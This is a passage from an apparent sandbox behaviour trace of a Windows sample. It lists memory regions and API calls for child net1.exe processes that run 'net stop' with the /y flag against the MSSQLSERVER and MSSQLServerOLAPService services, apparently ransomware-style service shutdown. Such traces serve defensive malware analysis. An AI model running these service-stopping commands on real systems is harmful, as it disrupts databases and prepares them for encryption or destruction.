0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8717 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8718 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 685 os_tid = 0x804 [0106.994] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f750 | out: lpSystemTimeAsFileTime=0x18f750*(dwLowDateTime=0xf4ec56f0, dwHighDateTime=0x1d48689)) [0106.994] GetCurrentProcessId () returned 0xbec [0106.994] GetCurrentThreadId () returned 0x804 [0106.994] GetTickCount () returned 0x247b9 [0106.994] QueryPerformanceCounter (in: lpPerformanceCount=0x18f758 | out: lpPerformanceCount=0x18f758*=1815391200000) returned 1 [0106.995] GetModuleHandleW (lpModuleName=0x0) returned 0xffa10000 [0106.995] __set_app_type (_Type=0x1) [0106.995] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa29c9c) returned 0x0 [0106.995] __getmainargs (in: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788, _DoWildCard=0, _StartInfo=0xffa3479c | out: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788) returned 0 [0106.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.995] GetConsoleOutputCP () returned 0x1b5 [0106.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa3cec0 | out: lpCPInfo=0xffa3cec0) returned 1 [0106.995] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.997] sprintf_s (in: _DstBuf=0x18f6f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.997] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0106.998] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0106.998] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLSERVER /y" [0106.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f490, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0106.998] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.999] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f6e8 | out: Buffer=0x18f6e8*=0x204d50) returned 0x0 [0106.999] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f6e8 | out: Buffer=0x18f6e8*=0x20c100) returned 0x0 [0106.999] _fileno (_File=0x7fefdba2a80) returned 0 [0106.999] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0106.999] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.999] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.999] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.999] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.999] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.999] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.999] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.999] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.999] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.999] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.999] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.999] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.999] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.999] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.999] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.999] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.999] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.999] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.999] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.999] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.999] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.999] _wcsicmp (_String1="accounts", _String2="MSSQLSERVER") returned -12 [0106.999] _wcsicmp (_String1="computer", _String2="MSSQLSERVER") returned -10 [0106.999] _wcsicmp (_String1="config", _String2="MSSQLSERVER") returned -10 [0106.999] _wcsicmp (_String1="continue", _String2="MSSQLSERVER") returned -10 [0106.999] _wcsicmp (_String1="cont", _String2="MSSQLSERVER") returned -10 [0106.999] _wcsicmp (_String1="file", _String2="MSSQLSERVER") returned -7 [0107.000] _wcsicmp (_String1="files", _String2="MSSQLSERVER") returned -7 [0107.000] _wcsicmp (_String1="group", _String2="MSSQLSERVER") returned -6 [0107.000] _wcsicmp (_String1="groups", _String2="MSSQLSERVER") returned -6 [0107.000] _wcsicmp (_String1="help", _String2="MSSQLSERVER") returned -5 [0107.000] _wcsicmp (_String1="helpmsg", _String2="MSSQLSERVER") returned -5 [0107.000] _wcsicmp (_String1="localgroup", _String2="MSSQLSERVER") returned -1 [0107.000] _wcsicmp (_String1="pause", _String2="MSSQLSERVER") returned 3 [0107.000] _wcsicmp (_String1="session", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="sessions", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="sess", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="share", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="start", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="stats", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="statistics", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="stop", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="time", _String2="MSSQLSERVER") returned 7 [0107.000] _wcsicmp (_String1="user", _String2="MSSQLSERVER") returned 8 [0107.000] _wcsicmp (_String1="users", _String2="MSSQLSERVER") returned 8 [0107.000] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0107.000] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0107.000] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0107.000] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0107.000] _wcsicmp (_String1="netpopup", _String2="MSSQLSERVER") returned 1 [0107.000] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0107.000] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0107.000] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0107.000] _wcsicmp (_String1="workstation", _String2="MSSQLSERVER") returned 10 [0107.000] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0107.000] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0107.000] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0107.000] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 [0107.000] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0107.000] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0107.000] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0107.000] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0107.000] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0107.000] _wcsupr (in: _String="MSSQLSERVER" | out: _String="MSSQLSERVER") returned="MSSQLSERVER" [0107.001] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x20ce10 [0107.004] GetServiceKeyNameW (in: hSCManager=0x20ce10, lpDisplayName="MSSQLSERVER", lpServiceName=0xffa35750, lpcchBuffer=0x18f608 | out: lpServiceName="", lpcchBuffer=0x18f608) returned 0 [0107.004] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0107.004] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0107.004] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0107.004] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0107.004] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0107.005] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0107.005] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0107.005] _wcsicmp (_String1="workstation", _String2="MSSQLSERVER") returned 10 [0107.005] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0107.005] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0107.005] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0107.005] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 [0107.005] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0107.005] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0107.005] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0107.005] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0107.005] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0107.005] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0107.005] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0107.005] NetServiceControl (in: servername=0x0, service="MSSQLSERVER", opcode=0x0, arg=0x0, bufptr=0x18f610 | out: bufptr=0x18f610) returned 0x889 [0107.005] wcscpy_s (in: _Destination=0xffa380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.005] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0107.006] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.007] GetFileType (hFile=0xb) returned 0x2 [0107.008] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f4d8 | out: lpMode=0x18f4d8) returned 1 [0107.008] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f4d0, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0x18f4d0*=0x1e) returned 1 [0107.008] GetFileType (hFile=0xb) returned 0x2 [0107.008] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f4d8 | out: lpMode=0x18f4d8) returned 1 [0107.008] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f4d0, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0x18f4d0*=0x2) returned 1 [0107.008] _ultow (in: _Dest=0x889, _Radix=1635648 | out: _Dest=0x889) returned="2185" [0107.008] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.009] GetFileType (hFile=0xb) returned 0x2 [0107.009] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f4d8 | out: lpMode=0x18f4d8) returned 1 [0107.009] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f4d0, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0x18f4d0*=0x34) returned 1 [0107.009] GetFileType (hFile=0xb) returned 0x2 [0107.009] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f4d8 | out: lpMode=0x18f4d8) returned 1 [0107.009] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f4d0, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0x18f4d0*=0x2) returned 1 [0107.010] NetApiBufferFree (Buffer=0x204d50) returned 0x0 [0107.010] NetApiBufferFree (Buffer=0x20c100) returned 0x0 [0107.010] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLSERVER /y" [0107.010] exit (_Code=2) Process: id = "224" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5d33b000" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0xaf8" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8719 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8720 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8721 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 8722 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8723 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8724 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8725 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8726 start_va = 0xffa10000 end_va = 0xffa42fff entry_point = 0xffa10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8727 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8728 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8729 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 8730 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8731 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 8732 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8733 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8764 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8765 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8766 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8767 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 8768 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8769 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8770 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8771 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8772 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8773 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8774 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8775 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8776 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8777 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8778 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8779 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8780 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8781 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8782 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8783 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8784 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8785 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8786 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8810 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 686 os_tid = 0x708 [0107.093] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaf9b0 | out: lpSystemTimeAsFileTime=0xaf9b0*(dwLowDateTime=0xf4fa9f30, dwHighDateTime=0x1d48689)) [0107.093] GetCurrentProcessId () returned 0x92c [0107.093] GetCurrentThreadId () returned 0x708 [0107.093] GetTickCount () returned 0x24816 [0107.093] QueryPerformanceCounter (in: lpPerformanceCount=0xaf9b8 | out: lpPerformanceCount=0xaf9b8*=1815401100000) returned 1 [0107.094] GetModuleHandleW (lpModuleName=0x0) returned 0xffa10000 [0107.094] __set_app_type (_Type=0x1) [0107.094] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa29c9c) returned 0x0 [0107.094] __getmainargs (in: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788, _DoWildCard=0, _StartInfo=0xffa3479c | out: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788) returned 0 [0107.094] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.094] GetConsoleOutputCP () returned 0x1b5 [0107.101] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa3cec0 | out: lpCPInfo=0xffa3cec0) returned 1 [0107.101] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.103] sprintf_s (in: _DstBuf=0xaf958, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.104] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.106] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.106] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.106] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" [0107.106] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xaf6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.106] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.106] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xaf948 | out: Buffer=0xaf948*=0x1a4d60) returned 0x0 [0107.106] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xaf948 | out: Buffer=0xaf948*=0x1ac130) returned 0x0 [0107.106] _fileno (_File=0x7fefdba2a80) returned 0 [0107.106] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.107] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.107] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.107] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.107] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.107] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.107] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.107] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.107] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.107] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.107] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.107] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.107] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.107] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.107] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.107] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.107] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.107] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.107] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.107] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.107] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.107] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.107] _wcsicmp (_String1="accounts", _String2="MSSQLServerOLAPService") returned -12 [0107.107] _wcsicmp (_String1="computer", _String2="MSSQLServerOLAPService") returned -10 [0107.107] _wcsicmp (_String1="config", _String2="MSSQLServerOLAPService") returned -10 [0107.107] _wcsicmp (_String1="continue", _String2="MSSQLServerOLAPService") returned -10 [0107.107] _wcsicmp (_String1="cont", _String2="MSSQLServerOLAPService") returned -10 [0107.107] _wcsicmp (_String1="file", _String2="MSSQLServerOLAPService") returned -7 [0107.107] _wcsicmp (_String1="files", _String2="MSSQLServerOLAPService") returned -7 [0107.107] _wcsicmp (_String1="group", _String2="MSSQLServerOLAPService") returned -6 [0107.107] _wcsicmp (_String1="groups", _String2="MSSQLServerOLAPService") returned -6 [0107.107] _wcsicmp (_String1="help", _String2="MSSQLServerOLAPService") returned -5 [0107.107] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerOLAPService") returned -5 [0107.107] _wcsicmp (_String1="localgroup", _String2="MSSQLServerOLAPService") returned -1 [0107.107] _wcsicmp (_String1="pause", _String2="MSSQLServerOLAPService") returned 3 [0107.107] _wcsicmp (_String1="session", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="sessions", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="sess", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="share", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="start", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="stats", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="statistics", _String2="MSSQLServerOLAPService") returned 6 [0107.107] _wcsicmp (_String1="stop", _String2="MSSQLServerOLAPService") returned 6 [0107.108] _wcsicmp (_String1="time", _String2="MSSQLServerOLAPService") returned 7 [0107.108] _wcsicmp (_String1="user", _String2="MSSQLServerOLAPService") returned 8 [0107.108] _wcsicmp (_String1="users", _String2="MSSQLServerOLAPService") returned 8 [0107.108] _wcsicmp (_String1="msg", _String2="MSSQLServerOLAPService") returned -12 [0107.108] _wcsicmp (_String1="messenger", _String2="MSSQLServerOLAPService") returned -14 [0107.108] _wcsicmp (_String1="receiver", _String2="MSSQLServerOLAPService") returned 5 [0107.108] _wcsicmp (_String1="rcv", _String2="MSSQLServerOLAPService") returned 5 [0107.108] _wcsicmp (_String1="netpopup", _String2="MSSQLServerOLAPService") returned 1 [0107.108] _wcsicmp (_String1="redirector", _String2="MSSQLServerOLAPService") returned 5 [0107.108] _wcsicmp (_String1="redir", _String2="MSSQLServerOLAPService") returned 5 [0107.108] _wcsicmp (_String1="rdr", _String2="MSSQLServerOLAPService") returned 5 [0107.108] _wcsicmp (_String1="workstation", _String2="MSSQLServerOLAPService") returned 10 [0107.108] _wcsicmp (_String1="work", _String2="MSSQLServerOLAPService") returned 10 [0107.108] _wcsicmp (_String1="wksta", _String2="MSSQLServerOLAPService") returned 10 [0107.108] _wcsicmp (_String1="prdr", _String2="MSSQLServerOLAPService") returned 3 [0107.108] _wcsicmp (_String1="devrdr", _String2="MSSQLServerOLAPService") returned -9 [0107.108] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerOLAPService") returned -1 [0107.108] _wcsicmp (_String1="server", _String2="MSSQLServerOLAPService") returned 6 [0107.108] _wcsicmp (_String1="svr", _String2="MSSQLServerOLAPService") returned 6 [0107.108] _wcsicmp (_String1="srv", _String2="MSSQLServerOLAPService") returned 6 [0107.108] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerOLAPService") returned -1 [0107.108] _wcsicmp (_String1="alerter", _String2="MSSQLServerOLAPService") returned -12 [0107.108] _wcsicmp (_String1="netlogon", _String2="MSSQLServerOLAPService") returned 1 [0107.108] _wcsupr (in: _String="MSSQLServerOLAPService" | out: 